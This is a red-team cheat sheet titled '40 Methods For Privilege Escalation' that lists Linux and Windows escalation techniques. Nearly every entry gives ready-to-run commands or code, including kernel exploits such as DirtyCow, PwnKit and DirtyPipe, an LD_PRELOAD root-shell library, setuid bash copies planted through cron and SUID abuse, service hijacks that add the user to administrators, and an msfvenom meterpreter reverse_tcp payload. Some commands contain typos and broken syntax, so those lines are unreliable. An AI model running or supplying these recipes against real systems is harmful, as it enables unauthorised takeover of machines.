40 Methods For Privilege Escalation(RTC0001)

Item: 40 Methods For Privilege Escalation(RTC0001)
Rating: 4.5

DirtyC0w

Domain: No

Local Admin: Yes

OS: Linux

Type: 0/1 Exploit

Methods:

gcc -pthread c0w.c -o c0w; ./c0w; passwd; id

CVE-2016-1531

Domain: No

Local Admin: Yes

OS: Linux

Type: 0/1 Exploit

Methods:

CVE-2016-1531.sh;id

Polkit

Domain: No

Local Admin: Yes

OS: Linux

Type: 0/1 Exploit

Methods:

https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation

poc.sh

DirtyPipe

Domain: No

Local Admin: Yes

OS: Linux

Type: 0/1 Exploit

Methods:

./traitor-amd64 --exploit kernel:CVE-2022-0847

Whoami;id

PwnKit

Domain: No

Local Admin: Yes

OS: Linux

Type: 0/1 Exploit

Methods:

./cve-2021-4034

Whoami;id

ms14_058

Domain: No

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Methods:

msf > use exploit/windows/local/ms14_058_track_popup_menu

msf exploit(ms14_058_track_popup_menu) > set TARGET < target-id >

msf exploit(ms14_058_track_popup_menu) > exploit

Hot Potato

Domain: No

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Methods:

In command prompt type: powershell.exe -nop -ep bypass

In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1

In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup

administrators user /add"

To confirm that the attack was successful, in Power Shell prompt type:

net localgroup administrators

Intel SYSRET

Domain: No

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Methods:

execute -H -f sysret.exe -a "-pid [pid]”

PrintNightmare

Domain: Yes

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Methods:

https://github.com/outflanknl/PrintNightmare

PrintNightmare 10.10.10.10 exp.dll

Folina

Domain: Y/N

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Methods:

https://github.com/JohnHammond/msdt-follina

python3 follina.py -c "notepad"

ALPC

Domain: Y/N

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Methods:

https://github.com/riparino/Task_Scheduler_ALPC

RemotePotato0

Domain: Y/N

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Methods:

sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user

.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1

CVE-2022-26923

Domain: Y/N

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Methods:

certipy req 'lab.local/cve$:CVEPassword1234*\@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA

Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show

MS14-068

Domain: Y/N

Local Admin: Yes

OS: Windows

Type: 0/1 Exploit

Methods:

python ms14-068.py -u user-a-1\@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

Sudo LD_PRELOAD

Domain: No

Local Admin: Yes

OS: Linux

Type: Injection

Methods:

#include <stdio.h>

#include <sys/types.h>

#include <stdlib.h>

1. void _init() {

unsetenv("LD_PRELOAD");

setgid(0);

setuid(0);

system("/bin/bash");

}

gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles

sudo LD_RELOAD=tmp/ldreload.so apache2

Abusing File Permission via SUID Binaries - .so injection)

Domain: No

Local Admin: Yes

OS: Linux

Type: Injection

Methods:

Mkdir /home/user/.config

#include <stdio.h>

#include <stdlib.h>

static void inject() _attribute _((constructor));

void inject() {

system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");

}

gcc -shared -o /home/user/.config/libcalc.so -fPIC/home/user/.config/libcalc.c

/usr/local/bin/suid-so

DLL Injection

Domain: No

Local Admin: Yes

OS: Windows

Type: Injection

Methods:

RemoteDLLInjector64

MemJect

https://github.com/tomcarver16/BOF-DLL-Inject

#define PROCESS_NAME "csgo.exe"

RemoteDLLInjector64.exe pid C:\runforpriv.dll

mandllinjection ./runforpriv.dll pid

Early Bird Injection

Domain: No

Local Admin: Yes

OS: Windows

Type: Injection

Methods:

hollow svchost.exe pop.bin

Process Injection through Memory Section

Domain: No

Local Admin: Yes

OS: Windows

Type: Injection

Methods:

sec-shinject PID /path/to/bin

Abusing Scheduled Tasks via Cron Path Overwrite

Domain: No

Local Admin: Yes

OS: Linux

Type: Abusing Scheduled Tasks

Methods:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >

systemupdate.sh;
chmod +x systemupdate.sh
Wait a while
/tmp/bash -p
id && whoami

Abusing Scheduled Tasks via Cron Wildcards

Domain: No

Local Admin: Yes

OS: Linux

Type: Abusing Scheduled Tasks

Methods:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >

/home/user/systemupdate.sh;
touch /home/user/ --checkpoint=1;
touch /home/user/ --checkpoint-action=exec=sh\systemupdate.sh
Wait a while
/tmp/bash -p
id && whoami

Abusing File Permission via SUID Binaries - Symlink)

Domain: No

Local Admin: Yes

OS: Linux

Type: Abusing File Permission

Methods:

su - www-data;

nginxed-root.sh /var/log/nginx/error.log;

In root user

invoke-rc.d nginx rotate >/dev/null 2>&1

Abusing File Permission via SUID Binaries - Environment Variables #1)

Domain: No

Local Admin: Yes

OS: Linux

Type: Abusing File Permission

Methods:

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' >/tmp/service.c;

gcc /tmp/services.c -o /tmp/service;

export PATH=/tmp:$PATH;

/usr/local/bin/sudi-env; id

Abusing File Permission via SUID Binaries - Environment Variables #2)

Domain: No

Local Admin: Yes

OS: Linux

Type: Abusing File Permission

Methods:

env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +S /tmp/bash)' /bin/sh -c /usr/local/bin/suid-env2; set +x; /tmp/bash -p'

DLL Hijacking

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

Windows_dll.c:

cmd.exe /k net localgroup administrators user /add

x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

sc stop dllsvc & sc start dllsvc

Abusing Services via binPath

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

sc config daclsvc binpath= "net localgroup administrators user /add"

sc start daclsvc

Abusing Services via Unquoted Path

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o

common.exe

Place common.exe in ‘C:\Program Files\Unquoted Path Service’.

sc start unquotedsvc

Abusing Services via Registry

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t

REG_EXPAND_SZ /d c:\temp\x.exe /f

sc start regsvc

Abusing Services via Executable File

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

sc start filepermsvc

Abusing Services via Autorun

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

In Metasploit (msf > prompt) type: use multi/handler

In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp

In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]

In Metasploit (msf > prompt) type: run

Open an additional command prompt and type:

msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o

program.exe

Place program.exe in ‘C:\Program Files\Autorun Program’.

Abusing Services via AlwaysInstallElevated

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

msfvenom -p windows/exec CMD='net localgroup

administrators user /add' -f msi-nouac -o setup.msi

msiexec /quiet /qn /i C:\Temp\setup.msi

SharpUp.exe AlwaysInstallElevated

Abusing Services via SeCreateToken

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll

!rmpriv

Abusing Services via SeDebug

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

Conjure-LSASS

syscall_enable_priv 20

Remote Process via Syscalls (HellsGate|HalosGate)

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

injectEtwBypass pid

Escalate With DuplicateTokenEx

Domain: Yes

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

PrimaryTokenTheft.exe pid

TokenPlaye.exe --impersonate --pid pid

Abusing Services via SeIncreaseBasePriority

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

start /realtime SomeCpuIntensiveApp.exe

Abusing Services via SeManageVolume

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

Just only compile and run SeManageVolumeAbuse

Abusing Services via SeRelabel

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

WRITE_OWNER access to a resource, including files and folders.

Run for privilege escalation

Abusing Services via SeRestore

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

1. Launch PowerShell/ISE with the SeRestore privilege present.

2. Enable the privilege with Enable-SeRestorePrivilege).

3. Rename utilman.exe to utilman.old

4. Rename cmd.exe to utilman.exe

5. Lock the console and press Win+U

Abuse via SeBackup

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic

In Metasploit (msf > prompt) type: set uripath x

In Metasploit (msf > prompt) type: run

In taskmgr and right-click on the “iexplore.exe” in the “Image Name” column

and select “Create Dump File” from the popup menu.

strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"

Select the Copy the Base64 encoded string.

In command prompt type: echo -ne [Base64 String] | base64 -d

Abusing via SeCreatePagefile

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys /OUTPUT uncompressed.bin

Abusing via SeSystemEnvironment

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll

TrustExec.exe -m exec -c "whoami /priv" -f

Abusing via SeTakeOwnership

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

1. takeown.exe /f "%windir%\system32"

2. icalcs.exe "%windir%\system32" /grant "%username%":F

3. Rename cmd.exe to utilman.exe

4. Lock the console and press Win+U

Abusing via SeTcb

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

PSBits

PrivFu

psexec.exe -i -s -d cmd.exe

Abusing via SeTrustedCredManAccess

Domain: No

Local Admin: Yes

OS: Windows

Type: Abuse Privilege

Methods:

.load C:\dev\PrivEditor\x64\Release\PrivEditor.dll

CredManBOF

TrustExec.exe -m exec -c "whoami /priv" -f

Rating:

11 Jan 2023

tutorial

#blue
#red

Methods For Fileless Execution(RTC0004) »

RedTeamRecipe

40 Methods For Privilege Escalation(RTC0001)

DirtyC0w

CVE-2016-1531

Polkit

DirtyPipe

PwnKit

ms14_058

Hot Potato

Intel SYSRET

PrintNightmare

Folina

ALPC

RemotePotato0

CVE-2022-26923

MS14-068

Sudo LD_PRELOAD

Abusing File Permission via SUID Binaries - .so injection)

DLL Injection

Early Bird Injection

Process Injection through Memory Section

Abusing Scheduled Tasks via Cron Path Overwrite

Abusing Scheduled Tasks via Cron Wildcards

Abusing File Permission via SUID Binaries - Symlink)

Abusing File Permission via SUID Binaries - Environment Variables #1)

Abusing File Permission via SUID Binaries - Environment Variables #2)

DLL Hijacking

Abusing Services via binPath

Abusing Services via Unquoted Path

Abusing Services via Registry

Abusing Services via Executable File

Abusing Services via Autorun

Abusing Services via AlwaysInstallElevated

Abusing Services via SeCreateToken

Abusing Services via SeDebug

Remote Process via Syscalls (HellsGate|HalosGate)

Escalate With DuplicateTokenEx

Abusing Services via SeIncreaseBasePriority

Abusing Services via SeManageVolume

Abusing Services via SeRelabel

Abusing Services via SeRestore

Abuse via SeBackup

Abusing via SeCreatePagefile

Abusing via SeSystemEnvironment

Abusing via SeTakeOwnership

Abusing via SeTcb

Abusing via SeTrustedCredManAccess

Explore →